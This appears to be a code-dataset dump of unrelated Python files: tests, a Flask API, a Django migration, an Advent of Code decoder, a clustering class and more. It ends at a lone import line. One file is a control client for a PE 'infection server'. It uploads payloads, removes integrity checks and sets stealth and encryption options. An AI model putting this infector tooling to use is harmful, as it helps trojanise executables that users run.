id
stringlengths 2
8
| text
stringlengths 16
264k
| dataset_id
stringclasses 1
value |
---|---|---|
3479449
|
# Lesson5: writing to a file
# source: code/file_write.py
with open('test.txt', 'w') as f:
f.write('Hello World!\n')
|
StarcoderdataPython
|
11333810
|
from flask import Flask, render_template
from flask import jsonify
from flask import request
from SentimentNet import SentimentAnalyzer
SN = SentimentAnalyzer(cuda=False)
app = Flask(__name__)
@app.route("/sentiment", methods=['GET','POST'])
def sentiment():
if request.method=="GET":
sent = request.args.get('sentence')
print(sent)
s = SN([sent])
return str(s.item())
if request.method=="POST":
sent = request.form['sentence']
print("POST "+sent)
s = SN([sent])
return str(sent)+":"+str(s.item())
if __name__ == "__main__":
app.run(host='0.0.0.0',port=9090,debug=True)
|
StarcoderdataPython
|
366912
|
<reponame>digital-land/view-builder<filename>view_builder/organisation_loader.py<gh_stars>0
import csv
from view_builder.model.table import Organisation, Entity
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from datetime import date
def load_organisations(path):
engine = create_engine("sqlite+pysqlite:///{}".format(str(path)))
with open("var/cache/organisation.csv", "r", newline="") as f, Session(
engine
) as session:
writer = csv.DictReader(f)
counter = 1
for row in writer:
org = Organisation(
entity_rel=Entity(
entity=counter, typology="organisation", dataset="organisation"
),
organisation=row["organisation"],
name=row["name"],
)
if row.get("entry-date", ""):
org.entry_date = date.fromisoformat(row["entry-date"])
if row.get("start-date", ""):
org.start_date = date.fromisoformat(row["start-date"])
if row.get("end-date", ""):
org.end_date = date.fromisoformat(row["end-date"])
session.add(org)
counter = counter + 1
session.commit()
if __name__ == "__main__":
load_organisations(path="view_model.db")
|
StarcoderdataPython
|
11251589
|
#!/usr/bin/env python3
# import lib
import socket
import struct
# communication: control <-> infection server
#
# 0 1 5 n
# +----------------------------------------------------------------------------------------+
# | | | |
# | command | length | data |
# | | | |
# +----------------------------------------------------------------------------------------+
#
# command: 1 Byte
# length from data: 4 Byte
# data: n Byte
#
class LibPeProtocol:
# Receive Commands
CMD_RECEIVE_SUCCESS = 0xFD
CMD_RECEIVE_ERROR = 0xFE
# Send Commands
CMD_SEND_ECHO = 0x01
CMD_SEND_RESTART = 0x02
CMD_SEND_SET_SECTION_NAME = 0x03
CMD_SEND_SET_METHOD_CHANGE_FLAGS = 0x04
CMD_SEND_SET_METHOD_NEW_SECTION = 0x05
CMD_SEND_SET_METHOD_ALIGNMENT_RESIZE = 0x06
CMD_SEND_SET_METHOD_ALIGNMENT = 0x07
CMD_SEND_SET_REMOVE_INTEGRITY_CHECK = 0x08
CMD_SEND_SET_DATA_PORT = 0x09
CMD_SEND_SET_DATA_INTERFACE = 0x0A
CMD_SEND_SET_CONTROL_PORT = 0x0B
CMD_SEND_SET_CONTROL_INTERFACE = 0x0C
CMD_SEND_SET_PAYLOAD_X86 = 0x0D
CMD_SEND_SET_PAYLOAD_X64 = 0x0E
CMD_SEND_GET_CONFIG = 0x0F
CMD_SEND_SET_PAYLOAD_NAME_X86 = 0x10
CMD_SEND_SET_TRY_STAY_STEALTH = 0x11
CMD_SEND_SET_ENABLE = 0x12
CMD_SEND_SET_RANDOM_SECTION_NAME = 0x13
CMD_SEND_SHUTDOWN = 0x14
CMD_SEND_SET_PAYLOAD_NAME_X64 = 0x15
CMD_SEND_SET_METHOD_CROSS_SECTION_JUMP = 0x16
CMD_SEND_SET_METHOD_CROSS_SECTION_JUMP_ITERATIONS = 0x17
CMD_SEND_SET_ENCRYPT = 0x18
CMD_SEND_SET_ENCRYPT_ITERATIONS = 0x19
CMD_SEND_SET_TOKEN = 0x20
# Command Type: Boolean (data = 1|0)
CMD_SEND_PARAM_BOOL = [CMD_SEND_SET_METHOD_CHANGE_FLAGS,
CMD_SEND_SET_METHOD_NEW_SECTION,
CMD_SEND_SET_METHOD_ALIGNMENT_RESIZE,
CMD_SEND_SET_METHOD_ALIGNMENT,
CMD_SEND_SET_METHOD_CROSS_SECTION_JUMP,
CMD_SEND_SET_REMOVE_INTEGRITY_CHECK,
CMD_SEND_SET_DATA_INTERFACE,
CMD_SEND_SET_CONTROL_INTERFACE,
CMD_SEND_SET_RANDOM_SECTION_NAME,
CMD_SEND_SET_TRY_STAY_STEALTH,
CMD_SEND_SET_ENABLE,
CMD_SEND_SET_ENCRYPT]
# Command Type: String (data = char-array)
CMD_SEND_PARAM_STR = [CMD_SEND_SET_SECTION_NAME,
CMD_SEND_SET_PAYLOAD_NAME_X86,
CMD_SEND_SET_PAYLOAD_NAME_X64]
# Command Type: Integer (data = int)
CMD_SEND_PARAM_INT = [CMD_SEND_SET_DATA_PORT,
CMD_SEND_SET_CONTROL_PORT,
CMD_SEND_SET_METHOD_CROSS_SECTION_JUMP_ITERATIONS,
CMD_SEND_SET_ENCRYPT_ITERATIONS]
# Command Type: Byte (data = File)
CMD_SEND_PARAM_BYTE = [CMD_SEND_SET_PAYLOAD_X86,
CMD_SEND_SET_PAYLOAD_X64,
CMD_SEND_SET_TOKEN]
# Command Type: Void (no data; length=0)
CMD_SEND_PARAM_VOID = [CMD_SEND_RESTART,
CMD_SEND_SHUTDOWN,
CMD_SEND_GET_CONFIG]
# init
def __init__(self, token: str, host: str, port: int, timeout: int=3, max_size: int=8192) -> object:
self.host = host
self.port = port
self.timeout = timeout
self.max_size = max_size
self.last_error = None
self.token = b'\xaa\xaa' + 30 * b'\x00'
self.set_token(token)
# Get last error description
def get_last_error(self) -> str:
return self.last_error
# Set access token
def set_token(self, token) -> bool:
byte_token = bytes.fromhex(token)
if (len(byte_token) != 32) or (byte_token[:2] != b'\xaa\xaa'):
return False
self.token = byte_token
return True
# Sends command, returns result
# return: None ... error
# byte array ... OK (== CMD_RECEIVE_SUCCESS)
def send_command(self, command, data):
# Build Payload
payload = self.token + bytes([command])
if command in self.CMD_SEND_PARAM_BOOL:
if type(data) is bool:
payload += struct.pack("<I?", 1, data)
else:
self.last_error = "protocol error: boolean command: wrong payload type"
return None
elif command in self.CMD_SEND_PARAM_STR:
if type(data) is str:
payload += struct.pack("<I", len(data)) + data.encode("ASCII")
else:
self.last_error = "protocol error: string command: wrong payload type"
return None
elif command in self.CMD_SEND_PARAM_INT:
if type(data) is int:
payload += struct.pack("<II", 4, data)
else:
self.last_error = "protocol error: integer command: wrong payload type"
return None
elif command in self.CMD_SEND_PARAM_BYTE:
if type(data) is bytes:
payload += struct.pack("<I", len(data)) + data
else:
self.last_error = "protocol error: byte command: wrong payload type"
return None
elif command in self.CMD_SEND_PARAM_VOID:
if data is None:
payload += struct.pack("<I", 0)
else:
self.last_error = "protocol error: void command: wrong payload type"
return None
else:
self.last_error = "protocol error: unknown command type"
return None
# Send command
# If something goes wrong while network transmission
try:
# Open socket
send_socket = socket.create_connection((self.host, self.port), self.timeout)
# Send command to server
if (send_socket is not None) and send_socket.send(payload):
# Receive from Server
mem = send_socket.recv(self.max_size)
# Close socket
send_socket.close()
if mem is not None:
if len(mem) > 32:
if mem[:32] == self.token:
if mem[32] == self.CMD_RECEIVE_SUCCESS:
# jeeee, SUCCESS!!!!!!
return mem[37:] # return response (possibly an empty array)
else:
self.last_error = "protocol error: not received 'SUCCESS'"
return None
else:
self.last_error = "protocol error: invalid response token"
return None
else:
self.last_error = "protocol error: response to short"
return None
else:
self.last_error = "protocol error: server is not responding"
return None
else:
self.last_error = "protocol error: no connection"
return None
except Exception:
self.last_error = "protocol error: connection exception"
return None
# should never happen
self.last_error = "protocol error: should never happen"
return None
|
StarcoderdataPython
|
9790890
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry import decorators
from telemetry.internal.actions import action_runner as action_runner_module
from telemetry.testing import tab_test_case
class AndroidActionRunnerInteractionTest(tab_test_case.TabTestCase):
@decorators.Enabled('android')
def testSmoothScrollBy(self):
self.Navigate('page_with_swipeables.html')
action_runner = action_runner_module.ActionRunner(
self._tab, skip_waits=True)
self.assertEquals(action_runner.EvaluateJavaScript('window.scrollY'), 0)
self.assertEquals(action_runner.EvaluateJavaScript('window.scrollX'), 0)
platform = action_runner.tab.browser.platform
app_ui = action_runner.tab.browser.GetAppUi()
view = app_ui.WaitForUiNode(resource_id='compositor_view_holder')
scroll_start1 = 0.5 * (view.bounds.center + view.bounds.bottom_right)
platform.android_action_runner.SmoothScrollBy(scroll_start1.x,
scroll_start1.y, 'down', 300)
self.assertTrue(action_runner.EvaluateJavaScript('window.scrollY') > 0)
scroll_start2 = 0.5 * (view.bounds.center + view.bounds.top_left)
platform.android_action_runner.SmoothScrollBy(scroll_start2.x,
scroll_start2.y, 'up', 500)
self.assertTrue(action_runner.EvaluateJavaScript('window.scrollY') == 0)
@decorators.Enabled('android')
def testInputSwipe(self):
self.Navigate('page_with_swipeables.html')
action_runner = action_runner_module.ActionRunner(
self._tab, skip_waits=True)
self.assertEquals(action_runner.EvaluateJavaScript('window.scrollY'), 0)
self.assertEquals(action_runner.EvaluateJavaScript('window.scrollX'), 0)
platform = action_runner.tab.browser.platform
app_ui = action_runner.tab.browser.GetAppUi()
view = app_ui.WaitForUiNode(resource_id='compositor_view_holder')
scroll_start1 = 0.5 * (view.bounds.center + view.bounds.bottom_right)
scroll_end1 = scroll_start1.y - 300
platform.android_action_runner.InputSwipe(scroll_start1.x, scroll_start1.y,
scroll_start1.x, scroll_end1, 300)
self.assertTrue(action_runner.EvaluateJavaScript('window.scrollY') > 0)
scroll_start2 = 0.5 * (view.bounds.center + view.bounds.top_left)
scroll_end2 = scroll_start2.y + 500
platform.android_action_runner.InputSwipe(scroll_start2.x, scroll_start2.y,
scroll_start2.x, scroll_end2, 500)
self.assertTrue(action_runner.EvaluateJavaScript('window.scrollY') == 0)
@decorators.Enabled('android')
def testInputText(self):
self.Navigate('blank.html')
self._tab.ExecuteJavaScript(
'(function() {'
' var elem = document.createElement("textarea");'
' document.body.appendChild(elem);'
' elem.focus();'
'})();')
action_runner = action_runner_module.ActionRunner(
self._tab, skip_waits=True)
platform = action_runner.tab.browser.platform
platform.android_action_runner.InputText('Input spaces')
platform.android_action_runner.InputText(', even multiple spaces')
# Check that the contents of the textarea is correct. It might take some
# time until keystrokes are handled on Android.
self._tab.WaitForJavaScriptCondition(
('document.querySelector("textarea").value === '
'"Input spaces, even multiple spaces"'),
timeout=5)
|
StarcoderdataPython
|
1757718
|
<filename>tests/test_base_transforms.py
import solt.transforms as slt
import solt.core as slc
import numpy as np
import pytest
import sys
import inspect
import torch
from .fixtures import *
def get_transforms_solt():
trfs = []
for name, obj in inspect.getmembers(sys.modules["solt.transforms"]):
if inspect.isclass(obj):
trfs.append(obj)
return trfs
def class_accepts(obj, parameter):
return parameter in inspect.signature(obj.__init__).parameters.keys()
def filter_trfs(trfs, parameter):
return filter(lambda t: class_accepts(t, parameter), trfs)
def filter_trfs_subclass(trfs, superclass):
return filter(lambda t: issubclass(t, superclass), trfs)
all_trfs_solt = get_transforms_solt()
@pytest.mark.parametrize("trf", filter_trfs(all_trfs_solt, "data_indices"))
def test_data_indices_cant_be_list(trf):
with pytest.raises(TypeError):
trf(data_indices=[])
@pytest.mark.parametrize("trf", filter_trfs(all_trfs_solt, "p"))
def test_base_transform_can_take_none_prop_and_it_becomes_0_5(trf):
assert 0.5 == trf(p=None).p
@pytest.mark.parametrize("trf", filter_trfs(all_trfs_solt, "data_indices"))
def test_data_indices_can_be_only_int(trf):
with pytest.raises(TypeError):
trf(data_indices=("2", 34))
@pytest.mark.parametrize("trf", filter_trfs(all_trfs_solt, "data_indices"))
def test_data_indices_can_be_only_nonnegative(trf):
with pytest.raises(ValueError):
trf(data_indices=(0, 1, -2))
@pytest.mark.parametrize("img", [img_2x2(), ])
@pytest.mark.parametrize("trf", filter_trfs(all_trfs_solt, "p"))
def test_transform_returns_original_data_if_use_transform_is_false(img, trf):
dc = slc.DataContainer((img,), "I")
trf = trf(p=0)
res = trf(dc)
np.testing.assert_array_equal(res.data[0], img)
@pytest.mark.parametrize("trf", [slt.Flip, slt.HSV, slt.Brightness])
@pytest.mark.parametrize("img", [img_3x3_rgb(), ])
def test_transform_returns_original_data_if_not_in_specified_indices(trf, img):
img_3x3 = img * 128
kpts_data = np.array([[0, 0], [0, 2], [2, 2], [2, 0]]).reshape((4, 2))
kpts = slc.Keypoints(kpts_data.copy(), frame=(3, 3))
dc = slc.DataContainer((img_3x3.copy(), img_3x3.copy(), img_3x3.copy(),
img_3x3.copy(), 1, kpts, 2), "IIIILPL")
kwargs = {"p": 1, "data_indices": (0, 1, 4)}
if class_accepts(trf, "gain_range"):
kwargs["gain_range"] = (0.7, 0.9)
if class_accepts(trf, "brightness_range"):
kwargs["brightness_range"] = (10, 20)
if class_accepts(trf, "h_range"):
kwargs["h_range"] = (50, 50)
kwargs["s_range"] = (50, 50)
if class_accepts(trf, "h_range"):
kwargs["h_range"] = (50, 50)
kwargs["s_range"] = (50, 50)
trf = trf(**kwargs)
res = trf(dc)
assert np.linalg.norm(res.data[0] - img_3x3) > 0
assert np.linalg.norm(res.data[1] - img_3x3) > 0
np.testing.assert_array_equal(res.data[2], img_3x3)
np.testing.assert_array_equal(res.data[3], img_3x3)
assert res.data[-1] == 2
np.testing.assert_array_equal(res.data[5].data, kpts_data)
@pytest.mark.parametrize("img_1, img_2", [(img_2x2(), img_6x6()),
(img_3x3(), img_3x4()),])
def test_data_dep_trf_raises_value_error_when_imgs_are_of_different_size(img_1, img_2):
trf = slt.SaltAndPepper(gain_range=0.0, p=1)
with pytest.raises(ValueError):
trf(slc.DataContainer((1, img_1.astype(np.uint8), img_2.astype(np.uint8)), "LII"))
@pytest.mark.parametrize("img", [img_2x2(), ])
def test_transform_returns_original_data_when_not_used_and_applied(img):
trf = slt.Flip(p=0)
dc = slc.DataContainer(img, "I")
dc_res = trf(dc)
assert dc_res == dc
@pytest.mark.parametrize("data", [[123,], "123", 2.3])
def test_wrap_data_throws_a_type_error_when_unknown_type(data):
with pytest.raises(TypeError):
slc.BaseTransform.wrap_data(data)
@pytest.mark.parametrize("data", [img_2x2(), slc.DataContainer(img_2x2(), "I")])
def test_data_container_wraps_correctly(data):
dc = slc.DataContainer(img_2x2(), "I")
assert slc.BaseTransform.wrap_data(data) == dc
@pytest.mark.parametrize("img", [img_3x3(), ])
@pytest.mark.parametrize("return_torch", [False, True])
@pytest.mark.parametrize("trf", filter(lambda t: not issubclass(t, slt.HSV), all_trfs_solt))
def test_transforms_return_torch(img, trf, return_torch):
if "p" in inspect.getfullargspec(trf.__init__):
trf: slc.BaseTransform = trf(p=1)
else:
trf: slc.BaseTransform = trf()
res = trf({"image": img},
return_torch=return_torch, as_dict=False,
mean=(0.5,), std=(0.5,))
assert isinstance(res, torch.FloatTensor) == return_torch
|
StarcoderdataPython
|
1859188
|
<reponame>jorgenwh/npstructures<filename>profiling/counter.py
import numpy as np
import cProfile
import pstats
from npstructures import RaggedArray, Counter
import time
N=5
hashes = (np.load(f"/home/knut/Sources/kmer_mapper/h{i}.npy") for i in range(N))
ragged = RaggedArray.load("profiling/.fullragged.npz")
#agged = RaggedArray.load("profiling/.new_fullragged.npz")
# ragged.save("profiling/.new_fullragged.npz")
counter = Counter(ragged, safe_mode=False)
# h = next(hashes)
# counter.count(np.insert(ragged._data, 0, 5))
p_stats_name = "profiling/.count.txt"
if True:
for h in hashes:
counter.count(h)
exit()
cProfile.run("[counter.count(h) for h in hashes]", p_stats_name)
stats = pstats.Stats(p_stats_name)
# stats.sort_stats("tottime")
stats.sort_stats("cumulative")
stats.print_stats()
|
StarcoderdataPython
|
3498357
|
"""
*Natural Logarithm*
"""
from dataclasses import dataclass
import jax.numpy as jnp
from ._operator import Logarithm
__all__ = ["NaturalLogarithm"]
@dataclass
class NaturalLogarithm(
Logarithm,
):
operator = jnp.log
|
StarcoderdataPython
|
3204238
|
<reponame>mkinsner/llvm
"""Show bitfields and check that they display correctly."""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class CppBitfieldsTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@no_debug_info_test
def test_bitfields(self):
self.build()
lldbutil.run_to_source_breakpoint(self, '// break here',
lldb.SBFileSpec("main.cpp", False))
# Accessing LargeBitsA.
self.expect_expr("lba", result_children=[
ValueCheck(name="", type="int:32"),
ValueCheck(name="a", type="unsigned int:20", value="2")
])
self.expect_expr("lba.a", result_type="unsigned int", result_value="2")
# Accessing LargeBitsB.
self.expect_expr("lbb", result_children=[
ValueCheck(name="a", type="unsigned int:1", value="1"),
ValueCheck(name="", type="int:31"),
ValueCheck(name="b", type="unsigned int:20", value="3")
])
self.expect_expr("lbb.b", result_type="unsigned int", result_value="3")
# Accessing LargeBitsC.
self.expect_expr("lbc", result_children=[
ValueCheck(name="", type="int:22"),
ValueCheck(name="a", type="unsigned int:1", value="1"),
ValueCheck(name="b", type="unsigned int:1", value="0"),
ValueCheck(name="c", type="unsigned int:5", value="4"),
ValueCheck(name="d", type="unsigned int:1", value="1"),
ValueCheck(name="", type="int:2"),
ValueCheck(name="e", type="unsigned int:20", value="20"),
])
self.expect_expr("lbc.c", result_type="unsigned int", result_value="4")
# Accessing LargeBitsD.
self.expect_expr("lbd", result_children=[
ValueCheck(name="arr", type="char[3]", summary='"ab"'),
ValueCheck(name="", type="int:32"),
ValueCheck(name="a", type="unsigned int:20", value="5")
])
self.expect_expr("lbd.a", result_type="unsigned int", result_value="5")
# Test BitfieldsInStructInUnion.
# FIXME: This needs some more explanation for what it's actually testing.
nested_struct_children = [
ValueCheck(name="", type="int:22"),
ValueCheck(name="a", type="uint64_t:1", value="1"),
ValueCheck(name="b", type="uint64_t:1", value="0"),
ValueCheck(name="c", type="uint64_t:1", value="1"),
ValueCheck(name="d", type="uint64_t:1", value="0"),
ValueCheck(name="e", type="uint64_t:1", value="1"),
ValueCheck(name="f", type="uint64_t:1", value="0"),
ValueCheck(name="g", type="uint64_t:1", value="1"),
ValueCheck(name="h", type="uint64_t:1", value="0"),
ValueCheck(name="i", type="uint64_t:1", value="1"),
ValueCheck(name="j", type="uint64_t:1", value="0"),
ValueCheck(name="k", type="uint64_t:1", value="1")
]
self.expect_expr("bitfields_in_struct_in_union",
result_type="BitfieldsInStructInUnion",
result_children=[ValueCheck(name="", children=[
ValueCheck(name="f", children=nested_struct_children)
])]
)
self.expect_expr("bitfields_in_struct_in_union.f.a",
result_type="uint64_t", result_value="1")
# Unions with bitfields.
self.expect_expr("uwbf", result_type="UnionWithBitfields", result_children=[
ValueCheck(name="a", value="255"),
ValueCheck(name="b", value="65535"),
ValueCheck(name="c", value="4294967295"),
ValueCheck(name="x", value="4294967295")
])
self.expect_expr("uwubf", result_type="UnionWithUnnamedBitfield",
result_children=[
ValueCheck(name="a", value="16777215"),
ValueCheck(name="x", value="4294967295")
]
)
# Class with a base class and a bitfield.
self.expect_expr("derived", result_type="Derived", result_children=[
ValueCheck(name="Base", children=[
ValueCheck(name="b_a", value="2", type="uint32_t")
]),
ValueCheck(name="d_a", value="1", type="uint32_t:1")
])
# Struct with bool bitfields.
self.expect_expr("bb", result_type="", result_children=[
ValueCheck(name="a", value="true", type="bool:1"),
ValueCheck(name="b", value="false", type="bool:1"),
ValueCheck(name="c", value="true", type="bool:2"),
ValueCheck(name="d", value="true", type="bool:2")
])
bb = self.frame().FindVariable('bb')
self.assertSuccess(bb.GetError())
bb_a = bb.GetChildAtIndex(0)
self.assertSuccess(bb_a.GetError())
self.assertEqual(bb_a.GetValueAsUnsigned(), 1)
self.assertEqual(bb_a.GetValueAsSigned(), 1)
bb_b = bb.GetChildAtIndex(1)
self.assertSuccess(bb_b.GetError())
self.assertEqual(bb_b.GetValueAsUnsigned(), 0)
self.assertEqual(bb_b.GetValueAsSigned(), 0)
bb_c = bb.GetChildAtIndex(2)
self.assertSuccess(bb_c.GetError())
self.assertEqual(bb_c.GetValueAsUnsigned(), 1)
self.assertEqual(bb_c.GetValueAsSigned(), 1)
bb_d = bb.GetChildAtIndex(3)
self.assertSuccess(bb_d.GetError())
self.assertEqual(bb_d.GetValueAsUnsigned(), 1)
self.assertEqual(bb_d.GetValueAsSigned(), 1)
# Test a class with a base class that has a vtable ptr. The derived
# class has bitfields.
base_with_vtable_children = [
ValueCheck(name="a", type="unsigned int:4", value="5"),
ValueCheck(name="b", type="unsigned int:4", value="0"),
ValueCheck(name="c", type="unsigned int:4", value="5")
]
self.expect_expr("base_with_vtable", result_children=base_with_vtable_children)
self.expect_var_path("base_with_vtable", children=base_with_vtable_children)
@no_debug_info_test
def test_bitfield_behind_vtable_ptr(self):
self.build()
lldbutil.run_to_source_breakpoint(self, '// break here',
lldb.SBFileSpec("main.cpp", False))
# Test a class with a vtable ptr and bitfields.
with_vtable_children = [
ValueCheck(name="a", type="unsigned int:4", value="5"),
ValueCheck(name="b", type="unsigned int:4", value="0"),
ValueCheck(name="c", type="unsigned int:4", value="5")
]
self.expect_expr("with_vtable", result_children=with_vtable_children)
self.expect_var_path("with_vtable", children=with_vtable_children)
# Test a class with a vtable ptr and unnamed bitfield directly after.
with_vtable_and_unnamed_children = [
ValueCheck(name="", type="int:4", value="0"),
ValueCheck(name="b", type="unsigned int:4", value="0"),
ValueCheck(name="c", type="unsigned int:4", value="5")
]
self.expect_expr("with_vtable_and_unnamed",
result_children=with_vtable_and_unnamed_children)
self.expect_var_path("with_vtable_and_unnamed",
children=with_vtable_and_unnamed_children)
|
StarcoderdataPython
|
1890914
|
<reponame>stetsonbost/MediaSocial<filename>MediaSocial/catalog/migrations/0006_auto_20180413_1527.py
# Generated by Django 2.0.3 on 2018-04-13 22:27
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('catalog', '0005_movies_music_television_visual'),
]
operations = [
migrations.AddField(
model_name='reply',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='movies',
name='release_date',
field=models.DateField(default=datetime.date(2018, 4, 13)),
),
migrations.AlterField(
model_name='television',
name='first_air_date',
field=models.DateField(default=datetime.date(2018, 4, 13)),
),
migrations.AlterField(
model_name='visual',
name='creator',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='catalog.Author'),
),
]
|
StarcoderdataPython
|
1688011
|
<filename>2021/day16.py
from __future__ import annotations
from dataclasses import dataclass
import functools
from aoc_tools import grouper
@dataclass
class Packet:
version: int
typ: int
val: int | list[Packet]
@classmethod
def from_file(cls, fobj):
version = fobj.read_bits(3)
typ = fobj.read_bits(3)
if typ == 4:
val = 0
while True:
bits = fobj.read_bits(5)
val = (val << 4) | (bits & 0xf)
if not bits & 0x10:
break
return cls(version, typ, val)
else:
# Operator
if fobj.read_bits(1):
num_packets = fobj.read_bits(11)
subs = [Packet.from_file(fobj) for _ in range(num_packets)]
else:
num_bits = fobj.read_bits(15)
start = fobj.bit_offset
subs = []
while fobj.bit_offset < start + num_bits:
subs.append(Packet.from_file(fobj))
return cls(version, typ, subs)
@classmethod
def from_string(cls, s):
return cls.from_file(BitReader(s))
@property
def total_version(self):
return self.version + (0 if self.typ == 4 else sum(p.total_version for p in self.val))
@property
def value(self):
match self.typ:
case 0:
return sum(p.value for p in self.val)
case 1:
return functools.reduce(lambda prod, p: prod * p.value, self.val, 1)
case 2:
return min(p.value for p in self.val)
case 3:
return max(p.value for p in self.val)
case 4:
return self.val
case 5:
return int(self.val[0].value > self.val[1].value)
case 6:
return int(self.val[0].value < self.val[1].value)
case 7:
return int(self.val[0].value == self.val[1].value)
case _:
raise NotImplementedError(f'Unknown packet type {self.typ}')
class BitReader:
def __init__(self, s, chunk_size=64):
self.chunk_size = (chunk_size // 4) * 4
self.bit_buffer = 0
self.bits_left = 0
self.bit_offset = 0
self.buffer = map(lambda a: int(''.join(a), 16),
grouper(s, self.chunk_size // 4, '0'))
def ensure_bits(self, bits):
while bits > self.bits_left:
self.bit_buffer = (self.bit_buffer << self.chunk_size) | next(self.buffer)
self.bits_left += self.chunk_size
def read_bits(self, bits):
self.ensure_bits(bits)
self.bit_offset += bits
# Grab as much as we need to return
self.bits_left -= bits
ret = self.bit_buffer >> self.bits_left
# Keep only what hasn't been used
self.bit_buffer &= (2 ** self.bits_left - 1)
return ret
def run(data):
packet = Packet.from_string(data)
return packet.total_version, packet.value
if __name__ == '__main__':
from aocd.models import Puzzle
fobj = BitReader('38006F45291200')
fobj.read_bits(3)
assert fobj.bit_offset == 3
fobj.read_bits(8)
assert fobj.bit_offset == 11
fobj.read_bits(25)
assert fobj.bit_offset == 36
p = Packet.from_string('D2FE28')
assert p.version == 6
assert p.typ == 4
assert p.val == 2021
p = Packet.from_string('38006F45291200')
assert p.version == 1
assert p.typ == 6
assert len(p.val) == 2
assert p.val[0].val == 10
assert p.val[1].val == 20
p = Packet.from_string('EE00D40C823060')
assert p.version == 7
assert p.typ == 3
assert len(p.val) == 3
assert p.val[0].val == 1
assert p.val[1].val == 2
assert p.val[2].val == 3
assert Packet.from_string('8A004A801A8002F478').total_version == 16
assert Packet.from_string('620080001611562C8802118E34').total_version == 12
assert Packet.from_string('C0015000016115A2E0802F182340').total_version == 23
assert Packet.from_string('A0016C880162017C3686B18A3D4780').total_version == 31
assert Packet.from_string('C200B40A82').value == 3
assert Packet.from_string('04005AC33890').value == 54
assert Packet.from_string('880086C3E88112').value == 7
assert Packet.from_string('CE00C43D881120').value == 9
assert Packet.from_string('D8005AC2A8F0').value == 1
assert Packet.from_string('F600BC2D8F').value == 0
assert Packet.from_string('9C005AC2F8F0').value == 0
assert Packet.from_string('9C0141080250320F1802104A08').value == 1
test_a, _ = run('A0016C880162017C3686B18A3D4780')
assert test_a == 31
_, test_b = run('9C0141080250320F1802104A08')
assert test_b == 1
puz = Puzzle(2021, 16)
part_a, part_b = run(puz.input_data)
puz.answer_a = part_a
print(f'Part 1: {puz.answer_a}')
puz.answer_b = part_b
print(f'Part 2: {puz.answer_b}')
|
StarcoderdataPython
|
3382165
|
"""
.. module:: SimpleConsensusClustering
SimpleConsensusClustering
*************
:Description: SimpleConsensusClustering
:Authors: bejar
:Version:
:Created on: 22/01/2015 10:46
"""
__author__ = 'bejar'
import numpy as np
from sklearn.base import BaseEstimator, ClusterMixin, TransformerMixin
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.cluster import KMeans, SpectralClustering
from numpy.random import randint
class SimpleConsensusClustering(BaseEstimator, ClusterMixin, TransformerMixin):
"""Simple Consensus Clustering Algorithm
Pararemeters:
n_clusters: int
Number of clusters of the base clusterers and the consensus cluster
base: string
base clusterer ['kmeans']
n_components: int
number of components of the consensus
consensus: string
consensus method ['coincidence']
"""
def __init__(self, n_clusters, n_clusters_base=None, ncb_rand=False, base='kmeans', n_components=10,
consensus='coincidence', consensus2='kmeans'):
self.n_clusters = n_clusters
if n_clusters_base is None:
self.n_clusters_base = n_clusters
else:
self.n_clusters_base = n_clusters_base
self.ncb_rand = ncb_rand
self.cluster_centers_ = None
self.labels_ = None
self.cluster_sizes_ = None
self.base = base
self.n_components = n_components
self.consensus = consensus
self.consensus2 = consensus2
def fit(self, X):
"""
Clusters the examples
:param X:
:return:
"""
if self.consensus == 'coincidence':
self.cluster_centers_, self.labels_ = self._fit_process_coincidence(X)
def _fit_process_coincidence(self, X):
"""
Obtains n_components kmeans clustering, compute the coincidence matrix and applies kmeans to that coincidence
matrix
:param X:
:return:
"""
baseclust = []
for i in range(self.n_components):
ncl = self.n_clusters_base if self.ncb_rand else randint(2, self.n_clusters_base+1)
if self.base == 'kmeans':
km = KMeans(n_clusters=ncl, n_init=1, init='random')
elif self.base == 'spectral':
km = SpectralClustering(n_clusters=ncl, assign_labels='discretize',
affinity='nearest_neighbors', n_neighbors=30)
km.fit(X)
baseclust.append(km.labels_)
coin_matrix = np.zeros((X.shape[0], X.shape[0]))
for l in baseclust:
for i in range(X.shape[0]):
coin_matrix[i, i] += 1
for j in range(i+1, X.shape[0]):
#if i != j:
if l[i] == l[j]:
coin_matrix[i, j] += 1
coin_matrix[j, i] += 1
coin_matrix /= self.n_components
if self.consensus2 == 'kmeans':
kmc = KMeans(n_clusters=self.n_clusters, n_jobs=-1)
kmc.fit(coin_matrix)
return kmc.cluster_centers_, kmc.labels_
elif self.consensus2 == 'spectral':
kmc = SpectralClustering(n_clusters=self.n_clusters, assign_labels='discretize',
affinity='nearest_neighbors', n_neighbors=40)
kmc.fit(coin_matrix)
return None, kmc.labels_
if __name__ == '__main__':
from sklearn import datasets
from sklearn.metrics import adjusted_mutual_info_score
from kemlglearn.datasets import make_blobs
import matplotlib.pyplot as plt
# data = datasets.load_iris()['data']
# labels = datasets.load_iris()['target']
# data, labels = make_blobs(n_samples=[100, 200], n_features=2, centers=[[1,1], [0,0]], random_state=2, cluster_std=[0.2, 0.4])
data, labels = datasets.make_circles(n_samples=400, noise=0.1, random_state=4, factor=0.3)
km = KMeans(n_clusters=2)
cons = SimpleConsensusClustering(n_clusters=2, n_clusters_base=20, n_components=50, ncb_rand=False)
lkm = km.fit_predict(data)
cons.fit(data)
lcons = cons.labels_
print(adjusted_mutual_info_score(lkm, labels))
print(adjusted_mutual_info_score(lcons, labels))
fig = plt.figure()
# ax = fig.gca(projection='3d')
# pl.scatter(X[:, 1], X[:, 2], zs=X[:, 0], c=ld.labels_, s=25)
#
ax = fig.add_subplot(131)
plt.scatter(data[:,0],data[:,1],c=labels)
ax = fig.add_subplot(132)
plt.scatter(data[:,0],data[:,1],c=lkm)
ax = fig.add_subplot(133)
plt.scatter(data[:,0],data[:,1],c=lcons)
plt.show()
|
StarcoderdataPython
|
211373
|
import re
